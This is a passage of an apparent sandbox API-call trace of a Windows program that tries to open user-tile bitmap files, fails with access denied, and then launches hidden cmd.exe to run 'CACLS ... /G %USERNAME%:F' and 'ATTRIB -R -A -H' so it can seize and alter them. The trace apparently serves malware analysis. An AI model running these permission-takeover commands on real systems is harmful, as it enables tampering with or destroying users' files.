%s") returned 0x19 [0189.832] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.833] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.833] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.833] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.833] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0189.833] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0189.833] ReleaseMutex (hMutex=0xf8) returned 1 [0189.833] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0189.833] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", lpFilePart=0x12eab4*="usertile40.bmp") returned 0x52 [0189.833] GetLastError () returned 0x5 [0189.833] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0189.833] LocalFree (hMem=0x1c6cc8) returned 0x0 [0189.833] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0189.833] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0189.834] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.834] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0189.834] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0189.834] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0189.834] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x878, dwThreadId=0x550)) returned 1 [0189.835] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] CloseHandle (hObject=0x1b4) returned 1 [0190.126] CloseHandle (hObject=0x120) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.126] ReleaseMutex (hMutex=0xf8) returned 1 [0190.126] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0190.127] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile40.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp", lpFilePart=0x12eab4*="usertile40.bmp") returned 0x52 [0190.127] GetLastError () returned 0x5 [0190.127] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0190.127] LocalFree (hMem=0x1c6cc8) returned 0x0 [0190.127] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0190.127] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0190.127] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.127] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.127] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0190.127] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0190.127] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 
[0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 [0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 [0190.127] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0190.127] ReleaseMutex (hMutex=0xf8) returned 1 [0190.127] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0190.127] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", lpFilePart=0x12eab4*="usertile41.bmp") returned 0x52 [0190.128] GetLastError () returned 0x5 [0190.128] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0190.128] LocalFree (hMem=0x1c6cc8) returned 0x0 [0190.128] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0190.128] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0190.128] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.128] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0190.128] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0190.128] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0190.128] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9d4, dwThreadId=0x888)) returned 1 [0190.129] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] CloseHandle 
(hObject=0x1b4) returned 1 [0191.193] CloseHandle (hObject=0x120) returned 1 [0191.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] ReleaseMutex (hMutex=0xf8) returned 1 [0191.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] ReleaseMutex (hMutex=0xf8) returned 1 [0191.193] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.193] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.194] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp", lpFilePart=0x12eab4*="usertile41.bmp") returned 0x52 [0191.194] GetLastError () returned 0x5 [0191.194] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.194] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.194] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0191.194] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.194] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.194] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.194] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.194] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.194] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.194] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.194] ReleaseMutex (hMutex=0xf8) returned 1 [0191.195] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.195] ReleaseMutex (hMutex=0xf8) returned 1 [0191.195] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0191.195] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", lpFilePart=0x12eab4*="usertile42.bmp") returned 0x52 [0191.195] GetLastError () returned 0x5 [0191.195] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0191.195] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.195] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.195] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.195] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.195] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.195] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0191.195] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0191.195] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x8f8, dwThreadId=0x8f0)) returned 1 [0191.197] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0191.538] CloseHandle (hObject=0x1b4) returned 1 [0191.538] CloseHandle (hObject=0x120) returned 1 [0191.538] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.538] ReleaseMutex (hMutex=0xf8) returned 1 [0191.538] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.538] ReleaseMutex (hMutex=0xf8) returned 1 [0191.538] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.539] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile42.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", lpFilePart=0x12eab4*="usertile42.bmp") returned 0x52 [0191.539] GetLastError () returned 0x5 [0191.539] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0191.539] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.539] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0191.539] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.539] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.539] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0191.539] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 
[0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.539] ReleaseMutex (hMutex=0xf8) returned 1 [0191.539] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0191.540] ReleaseMutex (hMutex=0xf8) returned 1 [0191.540] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.540] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", lpFilePart=0x12eab4*="usertile43.bmp") returned 0x52 [0191.540] GetLastError () returned 0x5 [0191.540] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0191.540] LocalFree (hMem=0x1c6cc8) returned 0x0 [0191.540] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0191.540] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0191.540] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.540] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0191.540] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0191.540] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0191.540] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x954, dwThreadId=0xb08)) returned 1 [0191.541] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0191.936] CloseHandle 
